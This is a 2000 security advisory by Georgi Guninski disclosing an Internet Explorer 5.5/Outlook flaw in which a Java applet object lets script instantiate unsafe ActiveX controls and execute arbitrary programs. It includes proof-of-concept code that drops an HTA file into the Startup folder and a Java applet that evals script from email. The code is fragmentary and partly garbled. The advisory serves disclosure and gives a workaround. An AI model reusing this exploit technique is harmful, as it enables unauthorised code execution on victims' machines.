Georgi Guninski security advisory #23,
IE 5.5/Outlook security vulnerability - allows executing arbitrary programs
Systems affected: IE 5.5/Outlook/Outlook Express - probably
other versions, have not tested
Risk: High Date: 5 October 2000
Legal Notice: This Advisory is Copyright (c) 2000 Georgi
Guninski. You may distribute it unmodified. You may not modify it
and distribute it or distribute parts of it without the author's
written permission.
Disclaimer: The opinions expressed in this advisory and
program are my own and not of any company. The usual standard
disclaimer applies, especially the fact that Georgi Guninski is
not liable for any damages caused by direct or indirect use of
the information or functionality provided by this advisory or
program. Georgi Guninski, bears no responsibility for content or
misuse of this advisory or program or any derivatives thereof.
Description: Internet Explorer 5.5/Outlook allow executing
arbitray programs after viewing web page or email message. This
may lead to taking full control over user's computer.
Details: The problem is the
java object which may be instantiated from <APPLET> tag
(it throws security exception in java console, but returns object,
strange). The java object allows
creating and scripting arbitrary ActiveX objects, including
those not marked safe for scripting. Examine the code below for
more information.
The code is:
<APPLET code="" >
</APPLET> <!-- ^^^ This gives java exceptions
in java console, but the object is instantiated -->
a1=document.applets[0]; fn="..\\\\Start
Menu\\\\Programs\\\\Startup\\\\EA.HTA"; //fn="EA.HTA";
doc="<SCRIPT>s1=\'Hello world\\nTo get rid of this,
delete the file EA.HTA in Startup
function f1() { a1.setProperty('DOC',doc); }
function f() { // The ActiveX classid
a1.setCLSID(cl); a1.createInstance();
created');",2000); } setTimeout("f()",1000)
Just to get something like[]
Regarding this issue and Outlook with "security update" (probably
this should be another advisory). It is a bit more difficult to
exploit this from Outlook because of the "Outlook security
update" which stops "most scripting". It is common misbelief
that the "Outlook security update" stops all scripting, but this
is not true. It is possible to trigger the execution of Active
Script from email message with the help of Java. Send a
email message containing <IFRAME
-----------javascript.html------------- <APPLET
CODE="outlookjs.class" MAYSCRIPT> <PARAM NAME="command"
</APPLET> --------------------------------------- import
java.applet.Applet; import netscape.javascript.*; class
outlookjs extends Applet { public JSObject j; public void
init() { try { j=(JSObject)
j.eval(getParameter("command")); } catch
(Exception e) {System.out.println(e);}; } }
Workaround: Disable Active Scripting or Java or Scripting of
Java applets - better disable all active content in IE. Demonstration that
executes programs is available Demonstration that places
a file on Desktop is available